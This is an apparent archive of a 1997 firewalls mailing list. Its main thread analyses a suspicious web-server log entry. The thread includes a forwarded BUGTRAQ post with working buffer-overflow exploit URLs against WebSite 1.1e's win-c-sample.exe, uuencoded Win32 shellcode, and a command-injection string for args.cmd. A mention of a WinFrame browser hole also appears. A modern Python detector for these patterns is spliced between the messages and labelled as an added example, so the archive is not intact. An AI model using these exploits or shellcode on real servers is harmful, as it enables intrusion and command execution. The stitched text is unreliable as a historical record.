Nothing is below the "O/S >layer," nor does one speak of such a layer unless one intends "application >layer" and doesn't know an application from an O/S, nor can a single byte be >sent or retrieved over a device (networked or otherwise) unless an O/S is >relied upon, nor can a single access to memory, disk, or what-have-you be >performed by networking code "below the O/S layer," as we so quaintly say, >if there is no O/S involved. > >Gentlemen, if this represents your understanding of operating systems and >security, please contribute to alt.brush-sellers, not to firewalls. Easy Bruce, this is only firewalls at Mr. Rogers Neighborhood, not INFOSEC up at 20755. :) :) :) ___________________________ Bob McKisson Director of Cooth & Decorum Cypress Systems Corporation Virginia Beach, VA 23451 (757) 425-4195 Voice (757) 425-4196 FAX (757) 442-0888 STU-III pelicans@mindspring.com I don't give them hell...I just give them the truth, and they think it's hell. - Harry Truman From firewalls-owner Tue Jan 7 20:59:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA08565 for firewalls-outgoing; Tue, 7 Jan 1997 20:50:45 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA08523 for ; Tue, 7 Jan 1997 20:50:22 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id XAA01217 for ; Tue, 7 Jan 1997 23:50:52 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id WAA13206 for ; Tue, 7 Jan 1997 22:06:47 -0500 (EST) Message-ID: <32D30E6B.79D2@hon.com> Date: Tue, 07 Jan 1997 22:03:07 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Log entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: 
firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Recently, I recorded a log entry that was _very_ unusual and if someone could advise where I might seek information on deciphering entries such as the below it would be muchly appreciated. A book, white paper, anything.. 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" I believe this connection also caused a Watson error. The only exe I am running is for my hit counter. Thanks in advance Steve Steve@hon.com From firewalls-owner Tue Jan 7 21:21:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA25315 for firewalls-outgoing; Tue, 7 Jan 1997 17:51:50 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA25306 for ; Tue, 7 Jan 1997 17:51:38 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA27672; Wed, 8 Jan 1997 09:41:28 +0800 (SGT) Message-ID: <32D2FC75.7696@ncs.com.sg> Date: Wed, 08 Jan 1997 09:46:29 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: "Starkweather, Mike" CC: firewalls@GreatCircle.COM Subject: Re: Pointcast References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Starkweather, Mike wrote: > > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. 
Their > I-Server seems to help some but not as much as I had hoped. > > If this is the wrong place for this question please redirect me. > > Mike Starkweather > Anheuser-Busch This is not much of a firewall question, but... If you are using I-Server from PointCast, then you should be able to put the server directly on the firewall, downloading pointcast's information at regular intervals of the day. That will only constitute one request on the firewall per download. Subsequently, all of your users should download the information from the I-Server and NOT directly from PointCast. However, remember to ask your users to upgrade their pointcast client to version 1.1. On the finer details, you can check it out at : http://www.pointcast.com/support/iserver/faqs/cliredir.html -- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ A Happy New Year To All !!! From firewalls-owner Tue Jan 7 22:29:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA15964 for firewalls-outgoing; Tue, 7 Jan 1997 21:55:08 -0800 (PST) Received: from news2.mnsinc.com (news2.mnsinc.com [206.55.3.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA15903 for ; Tue, 7 Jan 1997 21:54:49 -0800 (PST) Received: from matrix.erols.com (smanning.mnsinc.com [206.239.28.60]) by news2.mnsinc.com (8.8.3/8.7.3) with SMTP id AAA17354 for ; Wed, 8 Jan 1997 00:54:23 -0500 (EST) Message-Id: <199701080554.AAA17354@news2.mnsinc.com> Comments: Authenticated sender is From: "matrix" To: Date: Wed, 8 Jan 1997 00:51:01 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: USAF: how it was hacked In-reply-to: <199701080136.UAA14304@unix1.sysnet.net> X-mailer: Pegasus Mail for Win32 (v2.50) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Patton wrote... > > Really quite anticlimactic.
The infamous phf script was left active on > the server and was how they got in. Root, the whole 9 yards. Really? What are these statements based on? Could we please keep the rumors to a dull roar? Thanks! Stephen Manning, Special Agent Computer Crime Investigator Air Force Office of Special Investigations Voice: (301) 981-5469 - Fax: (301) 981-3087 From firewalls-owner Tue Jan 7 22:44:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA17448 for firewalls-outgoing; Tue, 7 Jan 1997 22:05:56 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id WAA17412 for ; Tue, 7 Jan 1997 22:05:39 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id AAA03757; Wed, 8 Jan 1997 00:07:00 -0600 Date: Tue, 7 Jan 1997 23:59:49 -0600 (CST) From: Ron DuFresne To: Steve cc: firewalls@GreatCircle.COM Subject: Re: Log entry In-Reply-To: <32D30E6B.79D2@hon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997, Steve wrote: > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. 
>
From solar@ideal.ru Tue Jan 7 23:58:13 1997 Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ Resent-Date: Wed, 8 Jan 1997 00:04:23 -0600 (CST) Resent-From: "R. DuFresne" Resent-To: Ron DuFresne Resent-Subject: Resent mail....

Hi!

Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first.

I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?).

The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others):

> rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
> rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
> rem erased!! Same goes for args and extra path info!!!

and then some lines like this:

> echo QUERY_STRING="%QUERY_STRING%"

Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be:

http://website.host/cgi-dos/args.cmd?"&any+dos+command"

Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed.

Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:

> char *argv[32]; // Max 32 command line args

That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow.
Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s):

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset.
Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess.

Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.

begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[
`
end

begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end

Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like:

db 68h      ; push imm32
pop esi     ; \
pop eax     ; | - the value being pushed
jmp esi     ; /
call esp

instead of:

call $+5    ; would contain zeroes
pop esi

Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way.

As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions.

Signed, Solar Designer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything.
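Steve asked how to decipher a log entry like the one he posted, and the forwarded BUGTRAQ post explains what it is. The following is an added example, not code from the thread or from WebSite: a small Python decoder that parses the access-log line, splits the CGI "indexed" query on '+' the way a CGI/1.1 server builds the program's argv, URL-decodes each piece, and checks for the patterns the post describes: at least 32 query-derived arguments (win-c-sample.exe allocates `char *argv[32]`, and argv[0] is the program name, so 32 more already spill past the array), the `push imm32` / `pop esi` / `pop eax` / `jmp esi` / `call esp` stub at the head of the last argument, and a quote-closing `"&` aimed at a cgi-dos .cmd script. Steve's line is reassembled from the page with the 31 `+-` pairs written as a repeat; the /cgi-dos and plain entries, the 192.0.2.x client addresses, the `ARGV_SLOTS` threshold and every function name are the example's own assumptions.

```python
"""Decode an access-log request line and flag the WebSite 1.1e sample-CGI
abuse patterns described in Solar Designer's BUGTRAQ post.

Added example for this thread, not code from the thread or from WebSite.
STEVE_LOG is the line Steve posted (host already snipped on the page);
CMD_LOG and PLAIN_LOG are constructed for the example.
"""
import re
from urllib.parse import unquote_to_bytes

# client vhost ident [timestamp] "METHOD URI PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) (?P<ident>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# From the post:  char *argv[32]; // Max 32 command line args
# (assumed threshold: argv[0] is the program name, so 32 query args overflow)
ARGV_SLOTS = 32

# 68 <5E 58 FF E6> = push imm32 whose bytes are pop esi; pop eax; jmp esi,
# followed by FF D4 = call esp: the stub the post spells out.
SHELLCODE_STUB = bytes.fromhex("685e58ffe6ffd4")

# Steve's query: 31 "+-" pairs (counted from the line-wrapped URL in the
# post), one more "+", then the shellcode argument, truncated in his log.
STEVE_QUERY = '+-' * 31 + '+' + (
    'h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM'
    r'\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0'
    '%83%E9%1C%FF%D'
)
STEVE_LOG = (
    '207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] '
    '"GET /cgi-shl/win-c-sample.exe?' + STEVE_QUERY + ' HTTP/1.0" 500 0 "" '
    '"Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)"'
)
# Constructed: the args.cmd quote-break, with the '"' %22-encoded as a
# browser would send it; the server decodes it into QUERY_STRING.
CMD_LOG = (
    r'192.0.2.10 www.example.com - [08/Jan/1997:03:14:15 -0500] '
    r'"GET /cgi-dos/args.cmd?%22&dir+c:\ HTTP/1.0" 200 512 "" "Mozilla/3.0"'
)
# Constructed: an ordinary request, for contrast.
PLAIN_LOG = (
    '192.0.2.11 www.example.com - [08/Jan/1997:03:14:16 -0500] '
    '"GET /index.html HTTP/1.0" 200 2048 "" "Mozilla/3.0"'
)


def split_indexed_query(uri):
    """Return (path, args).  For an 'indexed' query (no '=' in it) a CGI/1.1
    server splits on '+' and URL-decodes each piece into one command-line
    argument (RFC 3875, section 4.4); that is how win-c-sample.exe gets its
    argv.  Any other query yields no arguments."""
    path, sep, query = uri.partition('?')
    if not sep or '=' in query:
        return path, []
    return path, [unquote_to_bytes(piece) for piece in query.split('+')]


def analyse(line):
    """Parse one log line into a report dict; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, args = split_indexed_query(m.group('uri'))
    decoded_query = b' '.join(args)       # the decoded command line
    report = {
        'client': m.group('client'),
        'path': path,
        'status': int(m.group('status')),
        'arg_count': len(args),
        'argv_overflow': len(args) >= ARGV_SLOTS,
        'shellcode_stub': SHELLCODE_STUB in decoded_query,
        'last_arg_head': args[-1][:len(SHELLCODE_STUB)] if args else b'',
        # args.cmd echoes "%QUERY_STRING%"; a '"' then '&' closes the quote
        # and starts a second command.
        'quote_break': (path.lower().endswith('.cmd')
                        and re.search(rb'"\s*&', decoded_query) is not None),
    }
    report['suspicious'] = (report['argv_overflow'] or report['shellcode_stub']
                            or report['quote_break'])
    return report


def scan(lines):
    """Reports for every line that parsed and tripped at least one check."""
    return [r for r in map(analyse, lines) if r and r['suspicious']]


if __name__ == '__main__':
    for r in scan([STEVE_LOG, CMD_LOG, PLAIN_LOG]):
        print(r['client'], r['path'], 'args=%d' % r['arg_count'],
              'argv_overflow=%s' % r['argv_overflow'],
              'shellcode_stub=%s' % r['shellcode_stub'],
              'quote_break=%s' % r['quote_break'])
```

Run stand-alone it prints one summary per flagged entry and stays quiet for the plain request. The log only shows what was requested, not whether the server fell over, so the 500 status and the Watson error Steve mentions are what confirm the hit; the 500 is also consistent with the "no blank line separating header and data" response the post says these requests provoke.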
From firewalls-owner Tue Jan 7 23:31:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA23258 for firewalls-outgoing; Tue, 7 Jan 1997 23:23:14 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA23225 for ; Tue, 7 Jan 1997 23:22:57 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id CAA11294 for ; Wed, 8 Jan 1997 02:23:25 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id CAA21415 for ; Wed, 8 Jan 1997 02:22:40 -0500 (EST) Message-ID: <32D34A61.230B@hon.com> Date: Wed, 08 Jan 1997 02:18:57 -0500 From: Steve Gallipeau Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Log Entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Thank you for the many responses..much faster than even CERT! As it turns out, I had been corresponding with someone regarding the security of my site and had asked him to take a look at it. Although in this case, a false alarm, it sure woke me up to the fact that I need to make things a lot more secure. Thanks again.
Steve Steve@hon.com From firewalls-owner Wed Jan 8 00:04:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA25077 for firewalls-outgoing; Tue, 7 Jan 1997 23:49:33 -0800 (PST) Received: from thol.vitel.com.sg (thol.vitnet.com.sg [203.120.113.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA25054 for ; Tue, 7 Jan 1997 23:49:16 -0800 (PST) Received: by thol.vitel.com.sg (940816.SGI.8.6.9/940406.SGI.AUTO) id QAA06904; Wed, 8 Jan 1997 16:09:06 -0800 Received: from web(172.16.254.20) by thol via smap (v3.0.1) id sma006901; Wed, 8 Jan 97 16:08:38 -0800 Message-ID: <32D43706.41C6@vitnet.com.sg> Date: Wed, 08 Jan 1997 16:08:38 -0800 From: Damien Miller X-Mailer: Mozilla 3.0Gold (X11; I; IRIX 5.3 IP22) MIME-Version: 1.0 To: Steve@hon.com, firewalls@greatcircle.com Subject: Re: Log entry References: <32D30E6B.79D2@hon.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve wrote: > > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. This is an attempt to exploit a buffer overrun in your (WebSite) server. Below is a post made to BUGTRAQ earlier this week. I expect to see more NT buffer overrun exploits now that someone has published shellcodes. 
Yet more proof that security through obscurity is insufficient.

Regards, Damien Miller
--
/--------------------------------------------------------------------------\
| Damien Miller --- Technical Consultant Vitnet Pte Ltd (Singapore) |
| "Show me a sane man and I will cure him for you" - C. G Jung (1875-1961) |
\--------------------------------------------------------------------------/

---------- Begin forwarded message
Subject: Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ

Hi!

Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first.

I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?).

The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others):

> rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
> rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
> rem erased!! Same goes for args and extra path info!!!

and then some lines like this:

> echo QUERY_STRING="%QUERY_STRING%"

Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be:

http://website.host/cgi-dos/args.cmd?"&any+dos+command"

Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed.

Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:

> char *argv[32]; // Max 32 command line args

That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow.
Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s):

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset.
Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess.

Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.

[snip]

Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like:

db 68h      ; push imm32
pop esi     ; \
pop eax     ; | - the value being pushed
jmp esi     ; /
call esp

instead of:

call $+5    ; would contain zeroes
pop esi

Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way.

As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions.
Signed, Solar Designer ---------- From firewalls-owner Wed Jan 8 00:48:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA28626 for firewalls-outgoing; Wed, 8 Jan 1997 00:31:07 -0800 (PST) Received: from ns.bcn.servicom.es (ns.bcn.servicom.es [194.106.1.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA28572 for ; Wed, 8 Jan 1997 00:30:39 -0800 (PST) From: ricard.scorpion@bcn.servicom.es Received: from ricard.scorpion.com by ns.bcn.servicom.es (8.6.11/FI-3.3) Wed, 8 Jan 1997 09:35:06 +0100 Message-Id: <199701080835.JAA03125@ns.bcn.servicom.es> To: firewalls@greatcircle.com Subject: Fw: Altavista firewall help Date: Wed, 9 Oct 1996 09:27:59 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1085 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- > From: Ricard Vilata i Salvanera > To: firewalls-owner@GreatCircle.com > Subject: Altavista firewall help > Date: martes 8 de octubre de 1996 5:50 > > Hi, > > I'm evaluating altavista firewall to implement our company internet > security, I want to use two different levels of firewalling: IP filtering > and application proxy. Our platform will be Windows NT. I would like to > use a DMZ implementation with altavista firewall and MS Proxy Server. Can > anybody tell me if I'm wrong ? I don't know anything about altavista > performance for more than 50 concurrent users. Have you any product > comparison between Altavista and Firewall-1 ? > > Please, can anybody help me with more data or experience ?
>
> --
> Ricard Vilata
> Business Area Manager
> ricard.scorpion@bcn.servicom.es
> _________________________________

From firewalls-owner Wed Jan 8 01:34:12 1997
Date: Wed, 08 Jan 1997 10:16:14 +0100
From: michael dreves
Organization: Berendsen Components
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V6 #8
References: <199701080648.WAA21235@miles.greatcircle.com>
Message-ID: <32D365DE.41EB@sbi.net>

Hi sweet Sus,

here comes Flemming's new e-mail.... there are actually two addresses that we should try:

drc@drc.baku.az (Danish Refugee Council)
fdr@drc.baku.az (presumably Flemming)

Kind regards,

--
michael dreves (MD113-RIPE), System Consultant
Berendsen Data, Phone +45-39577300, Fax +45-39577302
Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D

From firewalls-owner Wed Jan 8 01:44:45 1997
Date: 8 Jan 97 10:04:10
From: "massimo.cotrozzi"
To: darren cromer
Cc: "'xavier fauquet'", "'les @tracker.demon.co.uk'", "'firewalls @greatcircle.com'"
Subject: RE: Using Remote Workstation as Hole??
Message-Id: <9701080917.AA3746@notes2.compuserve.com>

>
> On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
> > Could someone point me to a site explaining to me what
> > Winframe is?
>
> I think ... http://www.cytrix.com ?
>
> Winframe is a remote processing system which allows PC clients to run server
> applications on a Windows system rather than using their own processing
> power.
>
> I think.
>
> ...Les...
>

One very nice hole of a poor (common) installation of WinFrame is that if you let people use browsers (say NT IE 2) on the server side of the connection, they can just "browse" an executable (say winfile) and ... voila', pop up a window browsing the server from the client ....
(This one is just a few hits away on your keyboard.)

Massimo Cotrozzi

Arthur Andersen - Computer Risk Management
Computer Security Senior Consultant
Via della Moscova 3, 20121 Milano
Tel. ++ 39-2-290371

From firewalls-owner Wed Jan 8 02:59:14 1997
Date: Wed, 8 Jan 1997 11:52:29 +0100
From: Franke Albert 2 Lt USAFE CSS/SCBS
To: "'firewalls@GreatCircle.com'"
Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!

I am responsible for securing (as well as I can) a DEC Alpha running Windows NT 4.0 and Internet Information Server as our WWW server. It is sitting as a node on our LAN and everyone in the world can access it. I want a program that I can run on it that will allow/disallow blocks of IP addresses such as 132.244 or .AF.MIL only. Also, I would like it (but not as necessary) to keep detailed logs. I have heard of O'Reilly's WebSite, but I don't know if this will do. I do not have funding for an expensive firewall machine, and it is impractical to add routers into our LAN. Please help if you have any suggestions. Thanks.

albert.franke@ramstein.af.mil
Albert E. Franke, 2Lt, USAF
OIC, USAFE Web Tech Support
480-7905

From firewalls-owner Wed Jan 8 03:14:38 1997
Date: Wed, 8 Jan 1997 12:05:34 +0100
From: Sebastian Stache
To: "'patton@sysnet.net'"
Cc: "'Firewalls (inet/GreatCircle)'"
Subject: RE: Air Force Web Site Hacked
Message-ID: <01BBFD5C.41D55860@ppp52.sbbs.se>

I fully agree. At the same time I'm relieved, since it means we're not experiencing anything magical.

----------
